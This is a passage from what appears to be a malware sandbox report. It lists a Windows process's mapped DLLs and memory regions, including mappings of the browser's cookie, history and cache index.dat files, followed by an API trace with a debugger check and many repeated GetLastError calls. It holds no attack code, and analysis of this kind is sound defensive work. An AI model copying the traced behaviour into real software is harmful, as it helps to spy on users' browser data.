0x77040000 end_va = 0x77134fff entry_point = 0x77041865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 984 start_va = 0x76c60000 end_va = 0x76e5afff entry_point = 0x76c622d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 985 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 986 start_va = 0x755b0000 end_va = 0x756ccfff entry_point = 0x755b158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 987 start_va = 0x75460000 end_va = 0x7546bfff entry_point = 0x7546238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 988 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 989 start_va = 0x12f0000 end_va = 0x15befff entry_point = 0x12f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 990 start_va = 0x2b0000 end_va = 0x2bcfff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 991 start_va = 0x74af0000 end_va = 0x74b06fff entry_point = 0x74af1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 992 start_va = 0x753f0000 end_va = 0x753fafff entry_point = 0x753f1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 993 start_va = 0x74180000 end_va = 0x7418cfff entry_point = 0x741811e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 994 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 995 start_va = 0x15c0000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x00000000015c0000" filename = "" Region: id = 996 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 997 start_va = 0x3b0000 end_va = 0x3c8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 998 start_va = 0x16c0000 end_va = 0x17bffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 999 start_va = 0x17c0000 end_va = 0x18bffff entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 1000 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1001 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1002 start_va = 0x74e70000 end_va = 0x74e85fff entry_point = 0x74e72dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1003 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1004 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1005 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1006 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1007 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1008 start_va = 0x74c20000 end_va = 0x74c5afff entry_point = 0x74c2128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1009 start_va = 0x18c0000 end_va = 0x19bffff entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 1010 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x753410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1011 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 1012 start_va = 0x3c0000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 1013 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1014 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1015 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1016 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1017 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1018 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1019 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1020 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1021 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1022 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1023 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1024 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1025 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1026 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1027 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1028 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1029 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1030 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1031 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1032 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1033 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1034 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1035 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1036 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1037 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1038 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1039 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1040 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1041 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1042 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1043 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1044 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1045 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1046 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1047 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1048 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1049 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1050 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1051 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1052 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1053 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1054 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1055 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1056 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1057 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1058 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1059 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1060 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1061 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1062 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1063 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1064 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1065 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1066 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1067 start_va = 0x3b0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1068 start_va = 0x3b0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1069 start_va = 0x742b0000 end_va = 0x7444dfff entry_point = 0x742de6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1070 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x3c0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1071 start_va = 0x3d0000 end_va = 0x3d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 1072 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x3c0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1073 start_va = 0x3e0000 end_va = 0x3e7fff entry_point = 0x3e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1074 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x3f0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1075 start_va = 0x74800000 end_va = 0x74820fff entry_point = 0x7480145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1076 start_va = 0x77420000 end_va = 0x77464fff entry_point = 0x774211e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1077 start_va = 0x76960000 end_va = 0x76994fff entry_point = 0x7696145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1078 start_va = 0x773e0000 end_va = 0x773e5fff entry_point = 0x773e1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1079 start_va = 0x530000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1080 start_va = 0x74d00000 end_va = 0x74d43fff entry_point = 0x74d163f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1081 start_va = 0x19c0000 end_va = 0x1a6ffff entry_point = 0x0 region_type = private name = "private_0x00000000019c0000" filename = "" Region: id = 1082 start_va = 0x740f0000 end_va = 0x7410bfff entry_point = 0x740fa431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1083 start_va = 0x740e0000 end_va = 0x740e6fff entry_point = 0x740e128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1084 start_va = 0x75890000 end_va = 0x75892fff entry_point = 0x75890000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 1085 start_va = 0x72c00000 end_va = 0x72c51fff entry_point = 0x72c014be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1086 start_va = 0x72be0000 end_va = 0x72bf4fff entry_point = 0x72be12de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1087 start_va = 0x733b0000 end_va = 0x733bcfff entry_point = 0x733b1326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1088 start_va = 0x530000 end_va = 0x530fff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1089 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1090 start_va = 0x530000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1091 start_va = 0x1a70000 end_va = 0x1b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a70000" filename = "" Region: id = 1092 start_va = 0x72050000 end_va = 0x72055fff entry_point = 0x72050000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 1093 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1094 start_va = 0x747f0000 end_va = 0x747fffff entry_point = 0x747f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1095 start_va = 0x1b70000 end_va = 0x1d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b70000" filename = "" Region: id = 1096 start_va = 0x1b70000 end_va = 0x1beffff entry_point = 0x0 region_type = private name = "private_0x0000000001b70000" filename = "" Region: id = 1097 start_va = 0x1d40000 end_va = 0x1d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1098 start_va = 0x1d50000 end_va = 0x1f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 1099 start_va = 0x1bf0000 end_va = 0x1ceffff entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 1100 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1101 start_va = 0x6f800000 end_va = 0x6f805fff entry_point = 0x6f8014b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1102 start_va = 0x1d50000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 1103 start_va = 0x735d0000 end_va = 0x735dffff entry_point = 0x735d0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1104 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1105 start_va = 0x735b0000 end_va = 0x735c1fff entry_point = 0x735b0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1106 start_va = 0x74e30000 end_va = 0x74e6bfff entry_point = 0x74e3145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1107 start_va = 0x735a0000 end_va = 0x735a7fff entry_point = 0x735a0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1108 start_va = 0x749d0000 end_va = 0x749d4fff entry_point = 0x749d15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1109 start_va = 0x75270000 end_va = 0x75275fff entry_point = 0x75271673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1110 start_va = 0x73fa0000 end_va = 0x73fd7fff entry_point = 0x73fa990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1111 start_va = 0x540000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1112 start_va = 0x1f40000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 1113 start_va = 0x766f0000 end_va = 0x76772fff entry_point = 0x766f23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1114 start_va = 0x550000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1115 start_va = 0x6f880000 end_va = 0x6f8d9fff entry_point = 0x6f880000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1116 start_va = 0x753e0000 end_va = 0x753edfff entry_point = 0x753e1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1117 start_va = 0x1f80000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 1118 start_va = 0x6e660000 end_va = 0x6e667fff entry_point = 0x6e660000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1119 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1250 start_va = 0x73f80000 end_va = 0x73f91fff entry_point = 0x73f83271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1251 start_va = 0x73ff0000 end_va = 0x73ffcfff entry_point = 0x73ff2012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1252 start_va = 0x2080000 end_va = 0x217ffff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1253 start_va = 0x2180000 end_va = 0x227ffff entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1254 start_va = 0x2280000 end_va = 0x237ffff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 1255 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1256 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1257 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Thread: id = 35 os_tid = 0xb08 [0056.827] IsDebuggerPresent () returned 0 [0056.827] AreFileApisANSI () returned 1 [0056.827] SetFileApisToANSI () [0056.827] SetFileApisToOEM () [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.827] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.828] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 [0056.829] GetLastError () returned 0x0 